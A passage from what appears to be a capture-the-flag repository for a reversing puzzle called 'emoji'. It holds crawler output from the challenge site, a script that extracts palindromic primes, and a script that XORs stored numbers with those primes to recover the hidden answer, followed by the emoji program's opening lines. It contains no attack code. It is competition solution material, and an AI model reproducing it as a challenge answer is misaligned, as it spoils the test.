"http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/75f4f167ff1f7420bbc1cd9e3cd582f9.html", "images": []}, 81 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-20.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-20.png", "path": "full/a7ed03a5f862a227aa9d8a231d5e14bc597e8def.jpg", "checksum": "236d0aa6d08e984f81373d69b669333c"}]}, 82 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/cb6a01e6c7b12a34da7e15a1929a759b.html", "images": []}, 83 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-49.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-49.png", "path": "full/2a7d838a735bbbe9784d64c3b4cb339eb928bb0c.jpg", "checksum": "3e1d3b4a606895d4bcf1acc097363d23"}]}, 84 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-42.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-42.png", "path": "full/03442a8406ee2b5255a3ac872c1b5211d9008f49.jpg", "checksum": "627c23085ed8528e3a91b71753ef986c"}]}, 85 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-51.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-51.png", "path": "full/ce76d6761ad80a79aeac15f03acf666e9d466219.jpg", "checksum": "27e13a585db629ffa98bafd195fd771d"}]}, 86 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-09.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-09.png", "path": "full/11853c4bbb6d521d9251b8c6951c37f53a121045.jpg", "checksum": "187b33cc13b1b099f6c407c1747498ce"}]}, 87 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-06.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-06.png", "path": "full/2eb685ba86b77cd8a7e8d6a98757bf0885d6c1e9.jpg", "checksum": "85a7eb69afe794b7e851701004abb82c"}]}, 88 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-13.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-13.png", "path": "full/9db8d2413cad5c2f8dc47c615fe5e0815bc71198.jpg", "checksum": "ee28eed52b3371bdcba0c7c5b589cf91"}]}, 89 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-18.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-18.png", "path": "full/5d6851300fd32edf5f96f3fa8831500de0a3260c.jpg", "checksum": "94195d9ab48cf7faf2841d70a173a357"}]}, 90 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-39.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-39.png", "path": "full/12230330606de58c0ba46cb77e33addcf3df3bfe.jpg", "checksum": "2a3cb43ab82a0c62eeb9230bf78af7d3"}]}, 91 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-43.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-43.png", "path": "full/da6110fb99479ae926a34e3a08068ac1c2a00136.jpg", "checksum": "b746b1c0eb5f84aa47c1be58bab022b9"}]}, 92 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-23.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-23.png", "path": "full/7693e8259b7b7c7aa823b546c1a4c12b8e0c5ef5.jpg", "checksum": "30fe42155b01005de1a64b2b1487d28f"}]}, 93 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-40.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-40.png", "path": "full/66b6dfb9742608a53e3a9887df11937c62af5486.jpg", "checksum": "06343e6e9d77192137fe12a5e611b0d7"}]}, 94 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-02.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-02.png", "path": "full/a157f2aacd198c0e467930b621a58a710bf62003.jpg", "checksum": "db50c0c3335cb6edcdf43e9b6d63996d"}]}, 95 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-38.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-38.png", "path": "full/56fccaa3f7f732e6a81659d0c3650f919418a1b9.jpg", "checksum": "9ec1f3016c3382d02c9993241456abbb"}]}, 96 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/1dec2ca01d4483533348b872bff74c6f.html", "images": []}, 97 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/835d04820fb39bafd50547f6859f4729.html", "images": []}, 98 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/647ac82477b912a3b93c751111202ecf.html", "images": []}, 99 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/5dbbfb29d8308ee367eac88d25c2b1d4.html", "images": []}, 100 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/2c1ff627fad3ccf58988458183d04207.html", "images": []}, 101 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-24.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-24.png", "path": "full/eaf9275859066337ee9705a8704be9135890bac7.jpg", "checksum": "7bdc16e7b04575df41b98d5ebcfb08d0"}]}, 102 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-44.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-44.png", "path": "full/e2491453f23a56d000f9bb1f94c50bbfd1a49f88.jpg", "checksum": "19eeaf7c454c769e6549dc1975b9bec2"}]}, 103 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-11.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-11.png", "path": "full/032025a04942044e0f52ef1b93adbd320bce5c03.jpg", "checksum": "2925ccc7fd21146022744fdff2bed4cb"}]}, 104 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-41.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-41.png", "path": "full/b4e5ce6a49dcc0a52ba4718bcac7ed7dfcd2c363.jpg", "checksum": "30567c6ebf0a10c5fe6263ec3dd96a34"}]}, 105 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-55.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-55.png", "path": "full/e882748be2bc4164a96f7e68a11c45c6fc7e4f21.jpg", "checksum": "39c33b88672614615684d0f68a333f41"}]}, 106 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-04.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-04.png", "path": "full/888145b3870b3aa0ac76bdb8f058ccbd9c24294b.jpg", "checksum": "4634f7a31cc78f720af264eb88b54823"}]}, 107 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-19.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-19.png", "path": "full/b5a863b50e48f479df73287fea653eb38aae756a.jpg", "checksum": "021adc2e8e0599aa5ace57def75595aa"}]}, 108 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-32.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-32.png", "path": "full/4296a5117242aa1f727f602d9b61184399f97ae1.jpg", "checksum": "2d3f07e51e4b8bd9851814cf455b5b3f"}]}, 109 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-35.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-35.png", "path": "full/9190ffcff48c22b119389d57737ddcac12018867.jpg", "checksum": "ce459ca6cf2cf65f7204bf1221a05f5a"}]}, 110 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-54.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-54.png", "path": "full/d18af402bddd63c6fbe50fa3dd5ef2b3a1c7eba1.jpg", "checksum": "dcc4c0992df45ca75a3cf2ba43b28389"}]}, 111 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-03.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-03.png", "path": "full/46cbe8e778a2d9810ec093fd4411358559ebbaa9.jpg", "checksum": "4df7ec39415813ef368595efbb93ed0b"}]}, 112 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-17.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-17.png", "path": "full/f170155323cc57d63c8652a19ec02ec817015b01.jpg", "checksum": "be42c8d16ae37258c72a10f9c1bf9d34"}]}, 113 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-22.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-22.png", "path": "full/b66cef15fb1f24f0357c293fabd1ee4ae370fcea.jpg", "checksum": "da8327ecd3cf8045541b5297509d3b55"}]} 114 | ][ 115 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com", "img": "\"Cat", "images": []}, 116 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/7e7399c7d06333ec886eee6b678d3595.html", "img": "\"Cat", "images": []}, 117 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/eaccf8725acda38ec2c1d9a591d54601.html", "img": "\"Cat", "images": []}, 118 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/94ad2d38e6c461572bad2199d0fd00ff.html", "img": "\"Cat", "images": []}, 119 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/c4827b3b9c0c9e94183f30303f1cf8cf.html", "img": "\"Cat", "images": []}, 120 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/211fb2008f7e90b83c307931957642aa.html", "img": "\"Cat", "images": []}, 121 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/b9ef5a48186aacc5a1ca7e3f6edd48d2.html", "img": "\"Cat", "images": []}, 122 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/9f6b0fe40439503e23e68e62a8af8e52.html", "img": "\"Cat", "images": []}, 123 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/cdea521070598db1a707d2e143e374e3.html", "img": "\"Cat", "images": []}, 124 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/bc38f47945d2d515719a37dacd214240.html", "img": "\"Cat", "images": []}, 125 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/0aecf5c83a232343bb1b1b7ffb666438.html", "img": "\"Cat", "images": []}, 126 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/9f9dbf163a76a90fd2a6b4de1010841e.html", "img": "\"Cat", "images": []}, 127 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/c2817b54b53077139e388c240060035f.html", "img": "\"Cat", "images": []}, 128 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/5bfb79469792c7dde95217f19536be92.html", "img": "\"Cat", "images": []}, 129 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/f0ce6a8adea95e300fab564bf80689d9.html", "img": "\"Cat", "images": []}, 130 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/c2d71f56f6b55ef8ded7544d45717c92.html", "img": "\"Cat", "images": []}, 131 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/1110015dc696d6c73e3f9aece0a8bcd9.html", "img": "\"Cat", "images": []}, 132 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/5850a44366b4286c2d2f758a05c246f5.html", "img": "\"Cat", "images": []}, 133 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/41c19f57ef225ddb1c63a4d1b008214c.html", "img": "\"Cat", "images": []}, 134 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/f9e55e5fefd6ab08428c35b310bddbaf.html", "img": "\"Cat", "images": []}, 135 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/9ca6dd45f49a59e5a8e2e87294acb42e.html", "img": "\"Cat", "images": []}, 136 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/b50d83f0910a5ecc2809ff6576d8e845.html", "img": "\"Cat", "images": []}, 137 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/168d5019cd091949cbbdc06acb80d78a.html", "img": "\"Cat", "images": []}, 138 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/f30bc5c7375ba52fed40659140e6460e.html", "img": "\"Cat", "images": []}, 139 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/4d1f3b376efdb55bcf4d6ac77b088073.html", "img": "\"Cat", "images": []}, 140 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/fedcf4569e5de4486998651b0f804ae5.html", "img": "\"Cat", "images": []}, 141 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d4f3400fc1c3427d937821b012f7aecc.html", "img": "\"Cat", "images": []}, 142 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/455a9d95d3f48a2703d02e734d18ab14.html", "img": "\"Cat", "images": []}, 143 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/4b556ca0f01983aca5856901d1e5a2d1.html", "img": "\"Cat", "images": []}, 144 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/42c8cc7f22acfa5d7ef297bdae2ba743.html", "img": "\"Cat", "images": []}, 145 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/253e66a37fe263f34cfe46d817b3cd16.html", "img": "\"Cat", "images": []}, 146 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/656eb695e3bb2feab65808d5bec205f2.html", "img": "\"Cat", "images": []}, 147 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/8b163f2f9559f60517c09fa6a177da79.html", "img": "\"Cat", "images": []}, 148 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/1dec2ca01d4483533348b872bff74c6f.html", "img": "\"Cat", "images": []}, 149 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d048074b981e463b4df2bf24b09d51c9.html", "img": "\"Cat", "images": []}, 150 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d5759ae9d021e5749b4fb627c539c51c.html", "img": "\"Cat", "images": []}, 151 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/750842afeb0e9be2b12e022b166c0a1c.html", "img": "\"Cat", "images": []}, 152 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/ebf110c11d160eaaa91d441305ff8874.html", "img": "\"Cat", "images": []}, 153 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/75f4f167ff1f7420bbc1cd9e3cd582f9.html", "img": "\"Cat", "images": []}, 154 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d929d4e9b615822d28e3c74cc3df0a36.html", "img": "\"Cat", "images": []}, 155 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/cb6a01e6c7b12a34da7e15a1929a759b.html", "img": "\"Cat", "images": []}, 156 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d8dc0f5386fc47d7f65df3134de92fff.html", "img": "\"Cat", "images": []}, 157 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/e0b54759634476f01beffd1f0171ede1.html", "img": "\"Cat", "images": []}, 158 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/bae8f02cb87dcb8f13fa8ba41a45ba70.html", "img": "\"Cat", "images": []}, 159 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d4b30b716bfa0481c0d77a40e49c18d5.html", "img": "\"Cat", "images": []}, 160 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/27c57d4efda38a82a001127bf3409e45.html", "img": "\"Cat", "images": []}, 161 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/968674872368d11d99758f9f4fa33d58.html", "img": "\"Cat", "images": []}, 162 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/baa23943b1a503845bdef9cdf4700a08.html", "img": "\"Cat", "images": []}, 163 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/3942ec1a459fcf0a2270e9e2b1b735d9.html", "img": "\"Cat", "images": []}, 164 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/b96110364868f63f1f6d0967addad330.html", "img": "\"Cat", "images": []}, 165 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/f10e496cacb28e2a77eb8f750741440e.html", "img": "\"Cat", "images": []}, 166 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/835d04820fb39bafd50547f6859f4729.html", "img": "\"Cat", "images": []}, 167 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/2c1ff627fad3ccf58988458183d04207.html", "img": "\"Cat", "images": []}, 168 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/647ac82477b912a3b93c751111202ecf.html", "img": "\"Cat", "images": []}, 169 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/22157e71e3d340dbc1191565ccf97544.html", "img": "\"Cat", "images": []}, 170 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/5dbbfb29d8308ee367eac88d25c2b1d4.html", "img": "\"Cat", "images": []} 171 | ] -------------------------------------------------------------------------------- /07-reversing-emoji/ctf_crawl/scrapy.cfg: -------------------------------------------------------------------------------- 1 | # Automatically created by: scrapy startproject 2 | # 3 | # For more information about the [deploy] section see: 4 | # https://scrapyd.readthedocs.io/en/latest/deploy.html 5 | 6 | [settings] 7 | default = ctf_crawl.settings 8 | 9 | [deploy] 10 | #url = http://localhost:6800/ 11 | project = ctf_crawl 12 | -------------------------------------------------------------------------------- /07-reversing-emoji/extract-palindroms.py: -------------------------------------------------------------------------------- 1 | # primes list downloaded from https://primes.utm.edu/lists/small/millions/ 2 | 3 | def is_palindrome(str): 4 | return str == str[::-1] 5 | 6 | filenames = ['primes1.txt', 'primes2.txt', 'primes3.txt', 'primes4.txt', 'primes5.txt', 'primes6.txt'] 7 | 8 | palindromes = [] 9 | for filename in filenames: 10 | with open(filename, 'r') as f: 11 | primes = [''] 12 | primes.extend(f.read().split()) 13 | 14 | p = [int(n) for n in map(str.strip, filter(is_palindrome, filter(None, primes)))] 15 | palindromes.extend(p) 16 | 17 | print("found {} palindromes".format(len(p))) 18 | 19 | with open('palindromes', 'w') as f: 20 | f.write(','.join(map(str, palindromes))) 21 | -------------------------------------------------------------------------------- /07-reversing-emoji/palindromes: -------------------------------------------------------------------------------- 1 | 2,3,5,7,11,101,131,151,181,191,313,353,373,383,727,757,787,797,919,929,10301,10501,10601,11311,11411,12421,12721,12821,13331,13831,13931,14341,14741,15451,15551,16061,16361,16561,16661,17471,17971,18181,18481,19391,19891,19991,30103,30203,30403,30703,30803,31013,31513,32323,32423,33533,34543,34843,35053,35153,35353,35753,36263,36563,37273,37573,38083,38183,38783,39293,70207,70507,70607,71317,71917,72227,72727,73037,73237,73637,74047,74747,75557,76367,76667,77377,77477,77977,78487,78787,78887,79397,79697,79997,90709,91019,93139,93239,93739,94049,94349,94649,94849,94949,95959,96269,96469,96769,97379,97579,97879,98389,98689,1003001,1008001,1022201,1028201,1035301,1043401,1055501,1062601,1065601,1074701,1082801,1085801,1092901,1093901,1114111,1117111,1120211,1123211,1126211,1129211,1134311,1145411,1150511,1153511,1160611,1163611,1175711,1177711,1178711,1180811,1183811,1186811,1190911,1193911,1196911,1201021,1208021,1212121,1215121,1218121,1221221,1235321,1242421,1243421,1245421,1250521,1253521,1257521,1262621,1268621,1273721,1276721,1278721,1280821,1281821,1286821,1287821,1300031,1303031,1311131,1317131,1327231,1328231,1333331,1335331,1338331,1343431,1360631,1362631,1363631,1371731,1374731,1390931,1407041,1409041,1411141,1412141,1422241,1437341,1444441,1447441,1452541,1456541,1461641,1463641,1464641,1469641,1486841,1489841,1490941,1496941,1508051,1513151,1520251,1532351,1535351,1542451,1548451,1550551,1551551,1556551,1557551,1565651,1572751,1579751,1580851,1583851,1589851,1594951,1597951,1598951,1600061,1609061,1611161,1616161,1628261,1630361,1633361,1640461,1643461,1646461,1654561,1657561,1658561,1660661,1670761,1684861,1685861,1688861,1695961,1703071,1707071,1712171,1714171,1730371,1734371,1737371,1748471,1755571,1761671,1764671,1777771,1793971,1802081,1805081,1820281,1823281,1824281,1826281,1829281,1831381,1832381,1842481,1851581,1853581,1856581,1865681,1876781,1878781,1879781,1880881,1881881,1883881,1884881,1895981,1903091,1908091,1909091,1917191,1924291,1930391,1936391,1941491,1951591,1952591,1957591,1958591,1963691,1968691,1969691,1970791,1976791,1981891,1982891,1984891,1987891,1988891,1993991,1995991,1998991,3001003,3002003,3007003,3016103,3026203,3064603,3065603,3072703,3073703,3075703,3083803,3089803,3091903,3095903,3103013,3106013,3127213,3135313,3140413,3155513,3158513,3160613,3166613,3181813,3187813,3193913,3196913,3198913,3211123,3212123,3218123,3222223,3223223,3228223,3233323,3236323,3241423,3245423,3252523,3256523,3258523,3260623,3267623,3272723,3283823,3285823,3286823,3288823,3291923,3293923,3304033,3305033,3307033,3310133,3315133,3319133,3321233,3329233,3331333,3337333,3343433,3353533,3362633,3364633,3365633,3368633,3380833,3391933,3392933,3400043,3411143,3417143,3424243,3425243,3427243,3439343,3441443,3443443,3444443,3447443,3449443,3452543,3460643,3466643,3470743,3479743,3485843,3487843,3503053,3515153,3517153,3528253,3541453,3553553,3558553,3563653,3569653,3586853,3589853,3590953,3591953,3594953,3601063,3607063,3618163,3621263,3627263,3635363,3643463,3646463,3670763,3673763,3680863,3689863,3698963,3708073,3709073,3716173,3717173,3721273,3722273,3728273,3732373,3743473,3746473,3762673,3763673,3765673,3768673,3769673,3773773,3774773,3781873,3784873,3792973,3793973,3799973,3804083,3806083,3812183,3814183,3826283,3829283,3836383,3842483,3853583,3858583,3863683,3864683,3867683,3869683,3871783,3878783,3893983,3899983,3913193,3916193,3918193,3924293,3927293,3931393,3938393,3942493,3946493,3948493,3964693,3970793,3983893,3991993,3994993,3997993,3998993,7014107,7035307,7036307,7041407,7046407,7057507,7065607,7069607,7073707,7079707,7082807,7084807,7087807,7093907,7096907,7100017,7114117,7115117,7118117,7129217,7134317,7136317,7141417,7145417,7155517,7156517,7158517,7159517,7177717,7190917,7194917,7215127,7226227,7246427,7249427,7250527,7256527,7257527,7261627,7267627,7276727,7278727,7291927,7300037,7302037,7310137,7314137,7324237,7327237,7347437,7352537,7354537,7362637,7365637,7381837,7388837,7392937,7401047,7403047,7409047,7415147,7434347,7436347,7439347,7452547,7461647,7466647,7472747,7475747,7485847,7486847,7489847,7493947,7507057,7508057,7518157,7519157,7521257,7527257,7540457,7562657,7564657,7576757,7586857,7592957,7594957,7600067,7611167,7619167,7622267,7630367,7632367,7644467,7654567,7662667,7665667,7666667,7668667,7669667,7674767,7681867,7690967,7693967,7696967,7715177,7718177,7722277,7729277,7733377,7742477,7747477,7750577,7758577,7764677,7772777,7774777,7778777,7782877,7783877,7791977,7794977,7807087,7819187,7820287,7821287,7831387,7832387,7838387,7843487,7850587,7856587,7865687,7867687,7868687,7873787,7884887,7891987,7897987,7913197,7916197,7930397,7933397,7935397,7938397,7941497,7943497,7949497,7957597,7958597,7960697,7977797,7984897,7985897,7987897,7996997,9002009,9015109,9024209,9037309,9042409,9043409,9045409,9046409,9049409,9067609,9073709,9076709,9078709,9091909,9095909,9103019,9109019,9110119,9127219,9128219,9136319,9149419,9169619,9173719,9174719,9179719,9185819,9196919,9199919,9200029,9209029,9212129,9217129,9222229,9223229,9230329,9231329,9255529,9269629,9271729,9277729,9280829,9286829,9289829,9318139,9320239,9324239,9329239,9332339,9338339,9351539,9357539,9375739,9384839,9397939,9400049,9414149,9419149,9433349,9439349,9440449,9446449,9451549,9470749,9477749,9492949,9493949,9495949,9504059,9514159,9526259,9529259,9547459,9556559,9558559,9561659,9577759,9583859,9585859,9586859,9601069,9602069,9604069,9610169,9620269,9624269,9626269,9632369,9634369,9645469,9650569,9657569,9670769,9686869,9700079,9709079,9711179,9714179,9724279,9727279,9732379,9733379,9743479,9749479,9752579,9754579,9758579,9762679,9770779,9776779,9779779,9781879,9782879,9787879,9788879,9795979,9801089,9807089,9809089,9817189,9818189,9820289,9822289,9836389,9837389,9845489,9852589,9871789,9888889,9889889,9896989,9902099,9907099,9908099,9916199,9918199,9919199,9921299,9923299,9926299,9927299,9931399,9932399,9935399,9938399,9957599,9965699,9978799,9980899,9981899,9989899,100030001,100050001,100060001,100111001,100131001,100161001,100404001,100656001,100707001,100767001,100888001,100999001,101030101,101060101,101141101,101171101,101282101,101292101,101343101,101373101,101414101,101424101,101474101,101595101,101616101,101717101,101777101,101838101,101898101,101919101,101949101,101999101,102040201,102070201,102202201,102232201,102272201,102343201,102383201,102454201,102484201,102515201,102676201,102686201,102707201,102808201,102838201,103000301,103060301,103161301,103212301,103282301,103303301,103323301,103333301,103363301,103464301,103515301,103575301,103696301,103777301,103818301,103828301,103909301,103939301,104000401,104030401,104040401,104111401,104222401,104282401,104333401 -------------------------------------------------------------------------------- /07-reversing-emoji/palindromes.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | first = [106,119,113,119,49,74,172,242,216,208,339,264,344,267,743,660,893,892,1007,975,10319,10550,10503,11342,11504,12533,12741,12833,13437,13926,13893,14450,14832,15417,15505,16094,16285,16599,16758,17488] 4 | 5 | second = [93766,93969,94440,94669,94952,94865,95934,96354,96443,96815,97280,97604,97850,98426] 6 | 7 | third = [9916239,9918082,9919154,9921394,9923213,9926376,9927388,9931494,9932289,9935427,9938304,9957564,9965794,9978842,9980815,9981858,9989997,100030045,100049982,100059926,100111100,100131019,100160922,100404094,100656111,100707036,100767085,100887990,100998966,101030055,101060206,101141058] 8 | 9 | 10 | with open('palindromes', 'r') as f: 11 | palindromes = list(map(int, f.read().split(','))) 12 | 13 | for i in range(len(first)): 14 | sys.stdout.write(chr(first[i] ^ palindromes[i])) 15 | 16 | for i in range(len(second)): 17 | sys.stdout.write(chr(second[i] ^ palindromes[i + 98])) 18 | 19 | for i in range(len(third)): 20 | sys.stdout.write(chr(third[i] ^ palindromes[i + 764])) -------------------------------------------------------------------------------- /07-reversing-emoji/program: -------------------------------------------------------------------------------- 1 | 🚛 🥇 0️⃣ ✋ 📥 🥇 2 | 🚛 🥇 1️⃣ 7️⃣ 4️⃣ 8️⃣ 8️⃣ ✋ 📥 🥇 3 | 🚛 🥇 1️⃣ 6️⃣ 7️⃣ 5️⃣ 8️⃣ ✋ 📥 🥇 4 | 🚛 🥇 1️⃣ 6️⃣ 5️⃣ 9️⃣ 9️⃣ ✋ 📥 🥇 5 | 🚛 🥇 1️⃣ 6️⃣ 2️⃣ 8️⃣ 5️⃣ ✋ 📥 🥇 6 | 🚛 🥇 1️⃣ 6️⃣ 0️⃣ 9️⃣ 4️⃣ ✋ 📥 🥇 7 | 🚛 🥇 1️⃣ 5️⃣ 5️⃣ 0️⃣ 5️⃣ ✋ 📥 🥇 8 | 🚛 🥇 1️⃣ 5️⃣ 4️⃣ 1️⃣ 7️⃣ ✋ 📥 🥇 9 | 🚛 🥇 1️⃣ 4️⃣ 8️⃣ 3️⃣ 2️⃣ ✋ 📥 🥇 10 | 🚛 🥇 1️⃣ 